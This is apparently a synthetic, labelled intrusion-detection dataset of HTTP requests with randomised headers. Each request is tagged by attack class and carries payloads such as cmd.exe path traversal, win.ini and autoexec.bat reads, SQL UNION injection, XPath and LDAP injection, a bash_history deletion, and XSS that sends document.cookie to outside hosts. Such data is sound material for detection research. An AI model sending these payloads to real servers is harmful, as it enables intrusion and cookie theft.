X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37810
Start - Id: 45415
class: PathTransversal
POST /rOfzJP@4zEx6ZIW/ieclotcnd76lrYh0/yortisevibXtecrzt3H.html? HTTP/1.1
Content-Length: 315
Content-Language: fn5
Content-Encoding: compress
Content-Location: http://umce.fr/1riae9gn/ieAd/hekis/co4K.mpeg
Content-MD5: OG9tcHVrbnN0Ymllb05wRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Dec 08 07:00:28 CET
Last-Modified: Fri, 28 Mar 08 10:03:27 UTC
Host: www.5niar.be
Connection: close
Accept: image/gif, image/jpeg
Accept-Charset: *
Accept-Encoding: gzip, compress, deflate, identity, deflate
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 147.195.122.195
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="133"
Date: Tue, 27 Mar 07 10:45:43 CET
ETag: "6zBxCy6m7hhCDZBV"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 14 Feb 04 18:46:27 CET
If-Unmodified-Since: Sun, 19 Apr 09 13:57:57 GMT
If-Match: *
If-None-Match: "ZyM0YzM6F1Vm2sLWX@Z"
If-Range: Sat, 16 Dec 06 24:14:16 GMT
Max-Forwards: 66
MIME-Version: 3.3
Pragma: lk='aog'
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Digest username="ps6nrs"
Range: -292636,082693-
Referer: /fawena/1eiey.png
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: aeit/7.5.2.2
UA-CPU: PowerPC
UA-Disp: 193,273,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 863x2272
Via: 4.3 www.lieir.js:2558, 1.1 201.241.148.50:59
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oqiuee=0aE+ilike&lnrolsT=ez&ae=s:\\WINNT\\win.ini&Rod.pbetweenuq=5103018&taasaoD=eG49pX6KSzUy&duMokstnbscell9=rqGxx&ee8srosspateM=tl&uykaiiSsklahy=03&q9C7=cRZQooiam&iEoenwei7tddsrr=o)b&ayi6F=hm(having~LiwlnTs@0g&atinogLitae=vmcaascYt&Etjysrresvo=tidrop37hrerpoecz7&xauotbsxdeee=07919&RUo1=900556

End - Id: 45415
Start - Id: 43739
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 11.176.17.236:92
Connection: hhro
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 42.85.153.5
Cookie: atoe=86497;en50tera=rtttometa+g;irleRsia=fatnfoenyatl1;irm=reM5CV4vfK;e7qilM8xs1r2s=sroi%utdmh;3us15oan8=fcetosycu2asn
Cookie2: $Version="25"
Date: Tue, 09 Sep 08 11:51:31 UTC
ETag: W/"MJRYeoM9MNrdpNUXW"
Expect: 100-continue
From: erev@Ao0tpiRe2.ch
If-Modified-Since: Thu, 19 Apr 07 17:18:22 CET
If-Unmodified-Since: Fri, 09 Sep 05 02:51:57 GMT
If-Match: "5Ca07Mlw.icw.VCsV"
If-None-Match: *
If-Range: *
Max-Forwards: 680
MIME-Version: 0.1
Pragma: t='t'
Proxy-Authorization: rguud skwsaiq=hCtyg
Authorization: Basic amVyYWNSOnV0ZWg=
Range: 69038-00
Referer: /ienoho/aonep1h/r9de/Hder/6lte.txt
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/8.5 (Windows; U; WinNT 3.8; ln-n7; rv:5.1.5) Gecko/21115117
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 337x2229
Via: 5.7 42.114.199.231, Erns/0.5 www.dfee4d.htm, 2.8 www.yo3t.tiff
Transfer-Encoding: deflate
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 5495098139
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43739
Start - Id: 35494
class: XPathInjection
GET /t_c6W21-98vQ5QF9q2g/nSW6zQx_chaving/rQ0KhMK/eE9AF/0A4tdtTers/Eybrt/p6mstdinj7IQNka-j/u@nzkKIz1_w5i3/ibuL/7XemMaapnclcdu0g/Qg/ceyi.php4? HTTP/1.1
Host: 61.235.213.153
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-roman, windows-1251;q=0.3, cp-936, iso-8859-5
Accept-Encoding: *
Accept-Language: szo0kxi-seaenele
Cache-Control: no-cache
Client-ip: 209.250.192.160
Cookie: htttanoa7royo=67938;b69oP=aErcp;fnfocetf=6;nodnaAd=htwktf;jQteicsdws5le=6601 or  count(path/child::node()[position()=((i+j+k+l+1)]  |     path/child::*()[position()=(k+1)])=1    or  0985=;unn=08563
Cookie2: $Version="4"
Date: Thu, 05 Feb 04 01:36:15 GMT
ETag: W/"Gjk5yTrGRwXduHBjQ"
Expect: annafei=outUe5;w4Pna=itnob
From: a8rg@iaaSadh.uk
If-Modified-Since: Mon, 22 Aug 05 16:03:26 CET
If-Unmodified-Since: Fri, 06 Aug 04 01:38:21 CET
If-Match: *
If-None-Match: "p8jc8FxIhhoWTaWrP9d"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.9
Pragma: eaenr2g=ulsaI
Proxy-Authorization: Basic UXVtaXBuOkNhc2RyZXRl
Authorization: N373pa nrenh=iswsnx
Range: 2-37781,-037,39-
Referer: /3tllfPr/R2ts/iiAasre/a7sttero/maahcd.msf
TE: gzip,chunked,trailers
Trailer: Upgrade
User-Agent: hj7eto8dBr/0.0.5
UA-Disp: 8924,467,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 053x299
Via: HTTP/2.5 www.1omv.js, 9.1 www.aro1rl.jpeg:3085, HTTP/8.1 9.57.110.38
Transfer-Encoding: ebr76; ut51g=htlohZ4
Upgrade: e4ap/2.2, nea/5.4, 2xoic/7.8, rghr/3.4
X-Forwarded-For: 184.57.165.17
X-Serial-Number: 480631962550690489
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35494
Start - Id: 38462
class: LdapInjection
GET /dIidugtoees/IOUmZNvsps/at/l7fiZktVgW9xvk9fj3u@/ssHM8YHoO7oOH./b.SeAAwd/ze/eraul5a1ooertofl5T/p2Onk/zit.tiff?302Dbmail.=done+&Rdhephept3wge=itEn&4ws9niisethy=%29+%28+++%7C+%28++cn%3D*o++++%27brien*++++%29%28mail%3D*o+++%27brien*++%29+++&MWhh=hiitrm%7C&tuFka=8lf%3Ad%3B%5D7leTHiea&2replace5Bk2HpositionIy=6596&gEiframel7aformGT=lleFacxiiratebn HTTP/1.0
Host: www.3eijdLurj.ch
Connection: close
Accept: video/*;q=0.8, audio/*, text/html
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: fwlI4-sreiaST;q=0.5, edn5a-plid, ot-5t7Tytoh
Cache-Control: max-stale=1
Client-ip: 55.73.45.180
Cookie: hmhoeaznnwgso=5429;osAtggxhshee2t=onmjfarumxudo;Etqe=9;ifxt=re;my=19021;pbaeeeuwEeBotl=r7A6aAtzgGM
Cookie2: $Version="35"
Date: Fri, 11 Feb 05 05:38:24 CET
ETag: W/"GuE9B8mQsEsN4IJ8"
Expect: betmtr=nyjiso;hCgrf6g
From: tyfttbup@ihotaatFt.uk
If-Modified-Since: Sat, 23 Dec 06 24:50:10 GMT
If-Unmodified-Since: Thu, 16 Jun 05 07:24:08 CET
If-Match: "jOuYQtaOS4IwqAs"
If-None-Match: *
If-Range: Fri, 05 Jun 09 09:18:42 UTC
Max-Forwards: 01
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: Basic ODVuc25naGw6bmF4dG1p
Range: 24-,76759-,-19589
Referer: /mcelTho9/4ns4Csdt/uoqeqpUs.pdf
TE: trailers
Trailer: If-Match
User-Agent: 6A2cu256I http://www.rRbuhniq.it
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: deflate
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38462
Start - Id: 40610
class: SSI
GET /assmA/vTZ_7connectxnF/4maih9mhssit9h/ec4tdUr6ter8uaRh5rn/to8TYI5F0d4lVnh8ybv.html?rsqv5u=6OIR&EDbpmochaaccess_logXfqfw=%3C%21--+%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&DwyJGvEJlogdnJ=667 HTTP/1.0
Host: www.aenn.st
Connection: close
Accept: video/*, image/*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.5
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 209.74.246.245
Cookie: ayfgr2iia8ho=1dzaTCy9Kl3j;ioidvakeePdtiwa=0115496;iWedka11etco8=ct;Ueauhshwienae=n@tZm3S6V;oajeqgreqit=538471
Cookie2: $Version="967"
Date: Wed, 10 Jun 09 11:53:13 CET
ETag: "rnmw-Waze18m@gv5_0W"
Expect: 100-continue
From: mObarai@oDeniipebe.it
If-Modified-Since: Tue, 24 Apr 07 18:59:11 CET
If-Unmodified-Since: Sun, 12 Jul 09 05:02:48 CET
If-Match: "D11xxMOuagBnAt8sG"
If-None-Match: *
If-Range: *
Max-Forwards: 16
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: bcfrun ebAc=Lgatnzn
Authorization: Basic c05ldDo5bHV0bm5lZQ==
Range: -916,8-,-198241
Referer: http://ud2q.de/roce/oipcEY2l.tar.gz
TE: trailers,gzip,deflate;q=0.1
Trailer: Expect
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 4.9; io-Es; rv:8.9.3) Gecko/34585928
UA-CPU: PowerPC
UA-Disp: 116,2183,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7337x662
Via: 5.0 195.165.85.89, FTP/9.9 155.176.128.142
Transfer-Encoding: compress
Upgrade: crlln/8.7, m6mMa/6.8, ehdTt/0.9, Rtiaun/0.7
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 5.3.246.86
X-Serial-Number: 0848613920149750
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40610
Start - Id: 47804
class: XSS
GET /hxaoran/iHTNJA2ZoaDT@/ahTt/Ba3rfEeI9/r1dd3nai2eer9nsf/m3g8BABr.php4?e6onR0t=nnph-&4selectTUcGxmlsHusr8passthru=76400&6scriptHYGD5=nsrrp&4rPoaceHfzttie=091365141&lu=d9uTon%22++++%3E%3Cbody%2520onload%3Dalert++%28document.cookie%29%3B%3E&rgAnrbctaiqer=E HTTP/1.1
Host: www.aatneli.uk
Connection: stnslt7
Accept: text/*, application/*;q=0.0, video/mpeg
Accept-Charset: *
Accept-Encoding: identity;q=0.2, identity;q=0.0, gzip, deflate;q=0.2
Accept-Language: n-ehsmta;q=0.9, lsqe7itu-6ei;q=0.7, lfldnhXT-hdihc5Gh
Cache-Control: max-stale
Client-ip: 52.228.63.189
Cookie: 9kzl=oii;ie3ensee17se=2;aijbao=c@rkHobrs yesn 
Cookie2: $Version="20"
Date: Mon, 31 Aug 09 15:49:46 UTC
ETag: W/"zby_7s_k0d7Q5VhG"
Expect: 100-continue
From: shnba@roottg.it
If-Modified-Since: Wed, 30 Jun 04 11:35:04 GMT
If-Unmodified-Since: Tue, 26 Sep 06 06:50:13 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Oct 06 05:04:31 CET
Max-Forwards: 101
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: amASrv ap3ii=e8Natn
Range: 944229-6,250-
Referer: http://www.ettI.cz/inpe/giegk/a2bhndI/sku5r/hksscgjt.php
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.9 (X11; U; Linux i386 2.4; 7d-ny; rv:1.4.0) Gecko/42197364
UA-CPU: 68000
UA-Disp: 191,879,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5941x524
Via: HTTP/5.1 www.oeaali.html, oaea/3.6 www.besmaat.png
Transfer-Encoding: compress
Upgrade: thgmp/3.3, cwanec/6.4
Warning: 315 223.24.177.34 "gnbpnesajImnUauppEa" "Thu, 03 Jun 04 13:41:49 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47804
Start - Id: 47090
class: XSS
GET /tdtaekecdolips/Wvp.ZCXtb-3Uhlhaving.cfm?qteiTe240tgsE=st0%5C&iwELet=264275149&zstpRyoeheext=nbKUoH.SIlk4&iwaoj7=t%3A1wocrrewast&pwSatsnrceh=%3Ca++++href%3D%22+javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.it.com%2Fcgi-bin%2Fan.cgi%27%2Bdocument.cookie%29%3B%5D++%22+%3E&rstcenzdf=-acceptyn4&onht=937407068 HTTP/1.0
Host: www.atkeHa3raN.net:80
Connection: rXmpeprm
Accept: text/*
Accept-Charset: iso-8859-8, iso-8859-2, euc-kr;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 4.100.87.145
Cookie: obgxs= scriptt4|utia;aiiahp=ejalaj;rn=s&aO;hea=95927;lzmoigepwe=7cf6u;reaor9sllNoo=f
Cookie2: $Version="958"
Date: Fri, 20 Apr 07 16:54:53 CET
ETag: W/"EhunCWQ4o1C.J05jFTu"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Wed, 16 Jun 04 06:03:19 CET
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: "V9.i.iQXnMQ7R7p"
If-Range: Mon, 06 Nov 06 18:40:39 UTC
Max-Forwards: 1
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: Basic YWVkZWYzOm5laGFldA==
Range: 8087-45811,698738-8731
Referer: http://www.e5anmm.be/EBus0/oAsit.asmx
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: sFsm (ot1TctmXqP; eSChlupZwZ)
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 320x898
Via: HTTP/4.9 www.ioUbio.gif, 6obt/3.3 211.151.240.74
Transfer-Encoding: deflate
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 172 www.rhaeeRv.gif "nh2drEOma5w7r" "Sat, 06 May 06 08:31:34 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47090
Start - Id: 38331
class: LdapInjection
GET /anlebf7mllvTrKs.dll?sREuvyinh8so=3817063&sytinKoisSsamc=ebtmptqteS&-DylSlNi3F=boot.initconnecti5&Ve6sT=%29++%28++%7C++%28Oasf%3Dcs*%29&n6ehqsseigwo=linkpitdhtacceshd&eSosOlth0ohe=dttse2wBatilelHR HTTP/1.1
Host: www.efne.uk
Connection: gteuD3
Accept: video/quicktime;q=0.9, audio/*;q=0.0
Accept-Charset: gb2312, iso-8859-4
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=6
Client-ip: 83.209.156.197
Cookie: unteeo2=yatdjevhhousrccrs@l;j0dwwix3zsock_stream-=oyrS;rSuN=31016;weaTiy=064233802
Cookie2: $Version="689"
Date: Thu, 27 Oct 05 04:46:31 UTC
ETag: "WbPrN@xJVi3tQ@DS"
Expect: atq5uIk=lcLmsuZ;i3ece4=Swd7rg
From: ze0mxcoe@eemraasrs.com
If-Modified-Since: Wed, 14 Jan 09 17:32:09 UTC
If-Unmodified-Since: Tue, 20 Jan 09 17:14:20 UTC
If-Match: "WcYr04L_hY7FT3Yv"
If-None-Match: *
If-Range: Fri, 21 Oct 05 24:29:05 UTC
Max-Forwards: 879
MIME-Version: 0.4
Pragma: ysenanRd='eo'
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Basic YWFuaTZudmo6aGRob3k=
Range: 4549-1
Referer: /s6TozIn/oasiacl/ey5icda.css
TE: gzip;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.9 (X11; U; Linux i386 0.9; nh-ih; rv:6.3.7) Gecko/84425375
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: 7.2 www.Altolo.png:8870, 1.8 78.30.23.67, a2fA/7.5 50.73.68.131
Transfer-Encoding: deflate
Upgrade: Ev8td4/8.8, eqerk/0.5, erNoe/4.2, ehp/2.5
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38331
Start - Id: 47186
class: XSS
GET /Cseeonntricgneh0ne/63kc4o.HCXU/etrsvFeehizamasad/nv3yG30zwM1vt.nsf?dacstwhtdtmIatk=wahiEesaaU%7Ct4&eurCi=g&dHkl8eurtrtdtif=%3Cimg++src++%3D++++%22+++++javascript%3A+++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.is.com%2Fcgi-bin%2Fsiereril.cgi%27%2Bdocument.cookie%29%3B%5D+%22%3E&ifnwE=0rmnyexst4Smha9a%24+I&huAeeut=ce+likern8includepedeleteat&nha=tsihttpTiamoub&oo965mAutereteS=123473&etwyreaetj=uxeeeefklieltye2ns&esgo5motsIh=593 HTTP/1.0
Host: www.ambohn.gov
Connection: close
Accept: video/quicktime, application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n7n-5knUnn;q=0.4, a-zaupDrf;q=0.1, so2t4tc-zbytud;q=0.7, 3eo8a-ryco;q=0.5
Cache-Control: max-age=7
Client-ip: 65.151.77.8
Cookie: hods=/y;u9etc9e2=it2oEnpewrIi9pOrg
Cookie2: $Version="93"
Date: Mon, 20 Mar 06 16:28:00 GMT
ETag: W/"9aZiZ33-f0WMd9NqvVy"
Expect: 100-continue
From: oeDi@asaha.net
If-Modified-Since: Mon, 22 Nov 04 10:30:00 GMT
If-Unmodified-Since: Fri, 16 Feb 07 05:17:21 UTC
If-Match: "KpN0d.NNBWyf3Np.O"
If-None-Match: *
If-Range: Thu, 27 Sep 07 22:47:24 CET
Max-Forwards: 11
MIME-Version: 3.0
Pragma: uva='di'
Proxy-Authorization: NTLM T2VlYWplZW9rdGVpdHRncmVTZnM1ZWVubWZqaWpuYWJw
Authorization: Digest cnonce="6a5heybr"
Range: 671-463
Referer: http://d0h4r.cz/tssn/rehdEaa/j8i8/eel0eo.asmx
TE: trailers,trailers,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.2 (compatible; Konqueror/2.0; Unix; euiaetcf)
UA-CPU: Sparc
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 739x565
Via: HTTP/1.5 www.ersai0tP.htm
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47186
Start - Id: 35491
class: XPathInjection
GET /hdmss2IsiuO4iwprGrs/ypcaasieNs.shtml?n_y_BtlTselectGbetweenI=to%2B&rDpstxodossePmt=%24le1t&pubseeoybe=amrv&dt=1497&csbhsatotee=H+%2F1&tkvnoh44eiswceQ=im&ng=7&txEn=e6C0FVoLo%40&clw=ncit&So=7&lri4nsncyncinho=8&eeii3dw4=22236&arr=nw&5th=130907&Yobyve9wus9wbs=oersm4husn4hu HTTP/1.1
Host: www.oih2W.net:30647
Connection: rstcess
Accept: */*
Accept-Charset: iso-8859-8
Accept-Encoding: identity;q=0.8, gzip;q=0.6, deflate
Accept-Language: a-lehime, owgan-7ha;q=0.8, WCn-upetxaon, e2v-ap7dUrdl;q=0.0, rcoanyaS-5
Cache-Control: only-if-cached
Cookie: oeet=ewlZK;i1ateiqfsfyAwse=dfGw'   or   path/child::node()[position()=N]    or     'dtm'='
Cookie2: $Version="58"
Date: Fri, 19 May 06 07:34:53 GMT
ETag: W/"tiivAPoMMzogU-aEGqo"
Expect: 100-continue
If-Modified-Since: Wed, 04 Apr 07 20:13:27 GMT
If-Unmodified-Since: Wed, 17 Mar 10 02:59:57 GMT
If-Match: *
If-None-Match: "skww5pfOCfWR3pMNnFPC"
If-Range: "nBRv-wtJ6cWRhL3"
Max-Forwards: 433
Pragma: adre='rtse6'
Authorization: NTLM c29wbmN0YXk1ZnNpaW81YVJpb2VvaDllN2RuZU5ubWpjdmU=
Referer: http://www.esol.ch/ls8a/N86tcixt/ic9ohdwi.dll
TE: deflate,deflate;q=0.4,trailers
Trailer: Authorization
User-Agent: ca6emtostxtctims
UA-Disp: 8924,467,32
Via: Roe/9.7 78.72.132.177
Transfer-Encoding: deflate
Upgrade: ae5ym/5.7
X-Forwarded-For: 184.57.165.17
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35491
Start - Id: 42120
class: SqlInjection
GET /ldw.gif?tc=sgpD&TXzr=wpi%24u&t7i9=v7m&peNtuuQ=8251&kJtmpUPN=iMRHW&ecme1=hj0laTd&aeacth=lh&dtyhIeeJn=lezimgnhEi%27IiE&sgi3lt=gipnfcfral%27+++++UNION++ALL++SELECT++++nnRsmh+++++FROM++iaoo6+++++WHERE+%27%27++++%3D+%27&teno=24142679&Oqb6hsaNSbetae=nExIpfV&ne=mbHN7c HTTP/1.0
Host: 91.207.1.103
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: iso-8859-1, cp-932, koi8-r;q=0.5
Accept-Encoding: 
Accept-Language: iediqE-lecshtn;q=0.7, Irho-f0e;q=0.3
Cache-Control: max-age=474
Client-ip: 209.54.39.204
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="52"
Date: Fri, 06 Jan 06 14:15:35 UTC
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: stgPOeE@DeaasWp.org
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Tue, 06 Dec 05 18:12:34 UTC
If-Match: *
If-None-Match: "1CYOhi3upGPrFe2R81bB"
If-Range: Sun, 14 Jun 09 17:42:16 UTC
Max-Forwards: 513
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 80-3804,023297-91,09-
Referer: http://hene.it/mOseso/secan.tar.gz
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.5 (compatible; Konqueror/9.5; Linux i386; esaiz; a4lErirna; pjrtq9aaon)
UA-CPU: MIPS
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 051x7587
Via: dto/9.8 www.nggan.jpeg:808, 1.1 164.60.70.204, 7.9 159.129.86.145
Transfer-Encoding: compress
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42120
Start - Id: 48467
class: XPathInjection
GET /kW/csasifsersnwarrcyea/itgcTSIo1tlTsozaemis/f8yas09mecdo/antnh7onDfetn/child3p/Yn2nsS/awJT/pas/q8i9ts.shtml?iLea4wbi=gsda2dltodri&1-Zo=ix5i-X&p.Gl=7qotiilLsdalioao&gKnoinTe=%26eehlcqrn6scatwt9ye5su&2hm1p=nautoexec%5C%2BinputvbscriptSoiframeiwp-u%3Ehw&nsEannvh=se9dhhtaccesan+&ar=6&nsi6dKriscerbt=ivnZz&AeeolseeEirsoe=qllVld8TUa&estsaopai=child2s&xsn9nturnaapt=3t+s&dts=f&nApznl=vprdn6YeNiiicGa&yn4rb=124347&yeEetufrmd=264 HTTP/1.0
Host: www.eernq.be
Connection: keep-alive
Accept: audio/x-wav;q=0.0, application/zip;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 50.174.183.166
Cookie: um6s=teTdutpleizwi;ee=4    or 1<  edbf/Mus/Tsd/child::text()[position()=133]    or     489='] | /* | /foo[bar=';CQqko=5398;reenwydntsndo=tedm5nyhRg;ioNa1h=3updatefiraem;ssi66khO=iiamfirgnecuanCe
Cookie2: $Version="6"
Date: Thu, 27 Nov 08 21:19:30 CET
ETag: "_835G29BP3A18xvXjR3Q"
Expect: 100-continue
From: iieeird@eetztl.net
If-Modified-Since: Wed, 18 Mar 09 07:10:47 GMT
If-Unmodified-Since: Wed, 18 Jun 08 09:23:21 GMT
If-Match: "CaH5XfCgrZD.QGZxXyF"
If-None-Match: "2gqUpgwYjWqe-Lqr7"
If-Range: Mon, 13 Mar 06 22:57:26 GMT
Max-Forwards: 7808
MIME-Version: 1.8
Pragma: lerie='drf'
Proxy-Authorization: Basic U3JobXVvOmw2YW8=
Authorization: Tdfeg9 irmhG=tith
Range: 87-,-8679
Referer: http://www.atfm.biz/l1bles/3lrkt/h4rai.gz
TE: trailers,chunked;q=0.2
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 1.8; ta-ri; rv:5.1.2) Gecko/74238768
UA-CPU: 68000
UA-Disp: 756,319,16
UA-Color: color32
UA-Pixels: 473x8946
Via: tt4r/5.3 www.mltDoMwc.tiff, 0.6 117.37.189.108, 6.9 132.49.9.163:67158
Transfer-Encoding: compress
Upgrade: x7pel/2.7, T0nds/0.0
Warning: 093 238.120.61.196:05147 "lPsIn" 
X-Forwarded-For: 194.7.222.25
X-Serial-Number: 326579
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48467
Start - Id: 43456
class: OsCommanding
GET /uJ8YdJqXoV/Epltao/oswqtvdt5anAwkba/oz4pRPybqeDGP1kl/lnt.sh?dediontp=%27%3B+++++rm+++%7E%2F.bash_history%3B&tTk9ttnbeociuB5=ddEeAeE0enpmniJh&sbiacal=jpGseaonhrnl8mp20&atnsriCn=oxY0TK&odn=isysteme&lenp3Iedrafr=Ts4ez&oercwahdaymonaE=1&nastdob=a9smoneaaw&hdp=o6sock_streamicieai&atr=88&egoulcS=fIFnii%40iL&isntee94meaa=70862&0lr=nhatta4i5i&olXe=5054 HTTP/1.1
Host: www.ee2arSmlXh.fr:80
Connection: keep-alive
Accept: video/*;q=0.1
Accept-Charset: iso-2022-kr;q=0.9
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 21.205.240.147
Date: Sat, 07 Jan 06 17:04:07 UTC
Expect: 1eOeN=sscanrN;mtcstr
From: ictt@eelonuT.ch
If-Modified-Since: Fri, 18 May 07 10:13:01 CET
MIME-Version: 2.3
Pragma: no-cache
Authorization: Digest realm
Referer: /dLruw/sulj/tdale/iyy2tabi/uiloyR.jsp
TE: trailers,trailers,trailers
User-Agent: Mozilla/3.9 (X11; U; Unix 2.6; iu-zi; rv:1.3.7) Gecko/11595626
Warning: 518 181.124.206.103:336 "aaIai6i" "Thu, 24 Feb 05 13:04:27 UTC"

null

End - Id: 43456
Start - Id: 47283
class: XSS
